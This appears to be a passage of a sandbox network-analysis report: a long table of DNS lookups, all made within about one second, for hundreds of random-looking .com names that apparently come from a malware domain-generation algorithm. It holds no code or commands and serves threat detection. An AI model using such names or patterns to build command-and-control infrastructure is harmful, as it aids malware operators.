                                                                                                                                                                                                              Aug 23, 2024 18:47:43.003557920 CEST192.168.2.41.1.1.10x25bdStandard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.009031057 CEST192.168.2.41.1.1.10xd015Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.009140015 CEST192.168.2.41.1.1.10x31c4Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.009397030 CEST192.168.2.41.1.1.10x35cdStandard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.009560108 CEST192.168.2.41.1.1.10x1ac5Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.009839058 CEST192.168.2.41.1.1.10xcb2fStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.010021925 CEST192.168.2.41.1.1.10x8c6eStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.010262012 CEST192.168.2.41.1.1.10x2fc9Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.010462046 CEST192.168.2.41.1.1.10xb7e6Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.010718107 CEST192.168.2.41.1.1.10xbe94Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.010967016 CEST192.168.2.41.1.1.10x8976Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.011208057 CEST192.168.2.41.1.1.10x51f7Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.011507034 CEST192.168.2.41.1.1.10x938Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.014025927 CEST192.168.2.41.1.1.10xe6ddStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.014755964 CEST192.168.2.41.1.1.10x4af3Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.014945030 CEST192.168.2.41.1.1.10x4Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.015314102 CEST192.168.2.41.1.1.10xcffaStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.015784025 CEST192.168.2.41.1.1.10xbfb6Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.042067051 CEST192.168.2.41.1.1.10xef5dStandard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.042439938 CEST192.168.2.41.1.1.10x1c2dStandard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.042609930 CEST192.168.2.41.1.1.10xf101Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.065406084 CEST192.168.2.41.1.1.10xe67bStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.065756083 CEST192.168.2.41.1.1.10x164dStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.065927029 CEST192.168.2.41.1.1.10x5541Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.066067934 CEST192.168.2.41.1.1.10x1288Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.066203117 CEST192.168.2.41.1.1.10x8065Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.066406012 CEST192.168.2.41.1.1.10xd6d8Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.068113089 CEST192.168.2.41.1.1.10x708Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.068502903 CEST192.168.2.41.1.1.10x20a3Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.068701029 CEST192.168.2.41.1.1.10x90e2Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.069247961 CEST192.168.2.41.1.1.10xef9fStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.069603920 CEST192.168.2.41.1.1.10xcc63Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.069782972 CEST192.168.2.41.1.1.10x913aStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.069957018 CEST192.168.2.41.1.1.10xe6deStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.072442055 CEST192.168.2.41.1.1.10x522fStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.086064100 CEST192.168.2.41.1.1.10x98b8Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.086263895 CEST192.168.2.41.1.1.10xa98dStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.086515903 CEST192.168.2.41.1.1.10x9547Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.086822987 CEST192.168.2.41.1.1.10xf26fStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.087775946 CEST192.168.2.41.1.1.10x8befStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.087819099 CEST192.168.2.41.1.1.10x602cStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088041067 CEST192.168.2.41.1.1.10x5a5bStandard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088180065 CEST192.168.2.41.1.1.10x62deStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088318110 CEST192.168.2.41.1.1.10xefd4Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088363886 CEST192.168.2.41.1.1.10xda3Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088527918 CEST192.168.2.41.1.1.10xaa37Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088671923 CEST192.168.2.41.1.1.10x651dStandard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088727951 CEST192.168.2.41.1.1.10xfe37Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.088831902 CEST192.168.2.41.1.1.10xe0b3Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.349770069 CEST192.168.2.41.1.1.10xc49bStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.350606918 CEST192.168.2.41.1.1.10x4ef3Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.351504087 CEST192.168.2.41.1.1.10x4709Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.351603985 CEST192.168.2.41.1.1.10x8a5eStandard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.352174997 CEST192.168.2.41.1.1.10x5d4bStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.352245092 CEST192.168.2.41.1.1.10x370dStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.352871895 CEST192.168.2.41.1.1.10x507eStandard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.352889061 CEST192.168.2.41.1.1.10x2611Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.353491068 CEST192.168.2.41.1.1.10xc512Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.353511095 CEST192.168.2.41.1.1.10xc6f5Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.354042053 CEST192.168.2.41.1.1.10xf7bStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.354324102 CEST192.168.2.41.1.1.10x52ddStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.354798079 CEST192.168.2.41.1.1.10xfcaeStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.354798079 CEST192.168.2.41.1.1.10xc7afStandard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.355376005 CEST192.168.2.41.1.1.10xb6a8Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.355506897 CEST192.168.2.41.1.1.10xc1cfStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.355917931 CEST192.168.2.41.1.1.10x3172Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.356435061 CEST192.168.2.41.1.1.10xbfb6Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.356832027 CEST192.168.2.41.1.1.10xdfa8Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.357229948 CEST192.168.2.41.1.1.10xa56fStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.357836962 CEST192.168.2.41.1.1.10x8d01Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.357867956 CEST192.168.2.41.1.1.10xa668Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.358480930 CEST192.168.2.41.1.1.10x8be7Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.358694077 CEST192.168.2.41.1.1.10x2ee0Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.358985901 CEST192.168.2.41.1.1.10x7a41Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.359324932 CEST192.168.2.41.1.1.10x9d46Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.359921932 CEST192.168.2.41.1.1.10x12efStandard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.360440016 CEST192.168.2.41.1.1.10x9a1dStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.360950947 CEST192.168.2.41.1.1.10x2530Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.361115932 CEST192.168.2.41.1.1.10x7d1Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.361392975 CEST192.168.2.41.1.1.10xb760Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.361845970 CEST192.168.2.41.1.1.10xe080Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.362179041 CEST192.168.2.41.1.1.10x374fStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.362559080 CEST192.168.2.41.1.1.10x5c55Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.362905025 CEST192.168.2.41.1.1.10x816bStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.362972021 CEST192.168.2.41.1.1.10x4e1cStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.363672972 CEST192.168.2.41.1.1.10x2d3eStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.363970995 CEST192.168.2.41.1.1.10xcc8dStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.364322901 CEST192.168.2.41.1.1.10x505Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.364408016 CEST192.168.2.41.1.1.10x714aStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.365082979 CEST192.168.2.41.1.1.10x1584Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.365082979 CEST192.168.2.41.1.1.10x5013Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.365489960 CEST192.168.2.41.1.1.10x9146Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.365881920 CEST192.168.2.41.1.1.10xa255Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.366345882 CEST192.168.2.41.1.1.10xaeceStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.366555929 CEST192.168.2.41.1.1.10xd04dStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.413058043 CEST192.168.2.41.1.1.10xe17aStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.414772034 CEST192.168.2.41.1.1.10x5257Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.414951086 CEST192.168.2.41.1.1.10x7c78Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.415096998 CEST192.168.2.41.1.1.10xb64bStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.415333986 CEST192.168.2.41.1.1.10x5ba1Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.415463924 CEST192.168.2.41.1.1.10xc6dbStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.415544987 CEST192.168.2.41.1.1.10x3149Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.415689945 CEST192.168.2.41.1.1.10xea63Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.416225910 CEST192.168.2.41.1.1.10x2704Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.416538000 CEST192.168.2.41.1.1.10xbdd5Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.416853905 CEST192.168.2.41.1.1.10x2f2eStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.422352076 CEST192.168.2.41.1.1.10x65fStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.422550917 CEST192.168.2.41.1.1.10x731dStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.422724962 CEST192.168.2.41.1.1.10x9774Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.422894955 CEST192.168.2.41.1.1.10x6374Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.423177958 CEST192.168.2.41.1.1.10x89a0Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.423365116 CEST192.168.2.41.1.1.10x99d0Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.423906088 CEST192.168.2.41.1.1.10x581bStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.760806084 CEST192.168.2.41.1.1.10x5ef9Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.761616945 CEST192.168.2.41.1.1.10xf352Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.762439966 CEST192.168.2.41.1.1.10xa1c4Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.762994051 CEST192.168.2.41.1.1.10x3bc9Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.763539076 CEST192.168.2.41.1.1.10xfe72Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.764175892 CEST192.168.2.41.1.1.10x180fStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.764983892 CEST192.168.2.41.1.1.10x6f59Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.765520096 CEST192.168.2.41.1.1.10x2e18Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.766119003 CEST192.168.2.41.1.1.10x5893Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.766649008 CEST192.168.2.41.1.1.10x796Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.767214060 CEST192.168.2.41.1.1.10x80baStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.767750025 CEST192.168.2.41.1.1.10xf9e5Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.768390894 CEST192.168.2.41.1.1.10xc9b7Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.768914938 CEST192.168.2.41.1.1.10x3caeStandard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.769582987 CEST192.168.2.41.1.1.10xafa4Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.770107031 CEST192.168.2.41.1.1.10x7ce6Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.770915031 CEST192.168.2.41.1.1.10xf1d2Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.771476030 CEST192.168.2.41.1.1.10x3ee5Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.772171974 CEST192.168.2.41.1.1.10xa0a6Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.772661924 CEST192.168.2.41.1.1.10x665eStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.773370028 CEST192.168.2.41.1.1.10x3c9eStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.774012089 CEST192.168.2.41.1.1.10xb400Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.774730921 CEST192.168.2.41.1.1.10x7baaStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.775394917 CEST192.168.2.41.1.1.10x192eStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.776149988 CEST192.168.2.41.1.1.10xf80bStandard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.776676893 CEST192.168.2.41.1.1.10xa20Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.777573109 CEST192.168.2.41.1.1.10x8365Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.780278921 CEST192.168.2.41.1.1.10x523eStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.783168077 CEST192.168.2.41.1.1.10x62ceStandard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.783368111 CEST192.168.2.41.1.1.10x4096Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.783503056 CEST192.168.2.41.1.1.10x3511Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.783869982 CEST192.168.2.41.1.1.10x9881Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.784084082 CEST192.168.2.41.1.1.10x9761Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.784375906 CEST192.168.2.41.1.1.10x36ecStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.784600973 CEST192.168.2.41.1.1.10x2883Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.784919024 CEST192.168.2.41.1.1.10x494cStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.785135984 CEST192.168.2.41.1.1.10x1088Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.785321951 CEST192.168.2.41.1.1.10x3945Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.785453081 CEST192.168.2.41.1.1.10x4ad1Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.785926104 CEST192.168.2.41.1.1.10x3d0Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.786149025 CEST192.168.2.41.1.1.10x567bStandard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.786401987 CEST192.168.2.41.1.1.10xe211Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.786586046 CEST192.168.2.41.1.1.10x77e0Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.786766052 CEST192.168.2.41.1.1.10xe047Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.786969900 CEST192.168.2.41.1.1.10x168Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787180901 CEST192.168.2.41.1.1.10x3957Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787477970 CEST192.168.2.41.1.1.10x8025Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.787965059 CEST192.168.2.41.1.1.10x7a36Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788198948 CEST192.168.2.41.1.1.10xf7b2Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788383007 CEST192.168.2.41.1.1.10x4df1Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788568020 CEST192.168.2.41.1.1.10x775eStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788777113 CEST192.168.2.41.1.1.10x6b52Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.788914919 CEST192.168.2.41.1.1.10xff70Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789300919 CEST192.168.2.41.1.1.10x1bceStandard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789483070 CEST192.168.2.41.1.1.10xaffeStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789727926 CEST192.168.2.41.1.1.10x4e63Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.789952993 CEST192.168.2.41.1.1.10xc7f0Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790107012 CEST192.168.2.41.1.1.10x7cf1Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790288925 CEST192.168.2.41.1.1.10xde3bStandard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790488958 CEST192.168.2.41.1.1.10xe41eStandard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790663958 CEST192.168.2.41.1.1.10x137fStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.790818930 CEST192.168.2.41.1.1.10xdd55Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791033030 CEST192.168.2.41.1.1.10xaa7cStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.791580915 CEST192.168.2.41.1.1.10x4539Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.990935087 CEST192.168.2.41.1.1.10x3791Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.991859913 CEST192.168.2.41.1.1.10x3b45Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.993124008 CEST192.168.2.41.1.1.10xad68Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.993768930 CEST192.168.2.41.1.1.10xc502Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
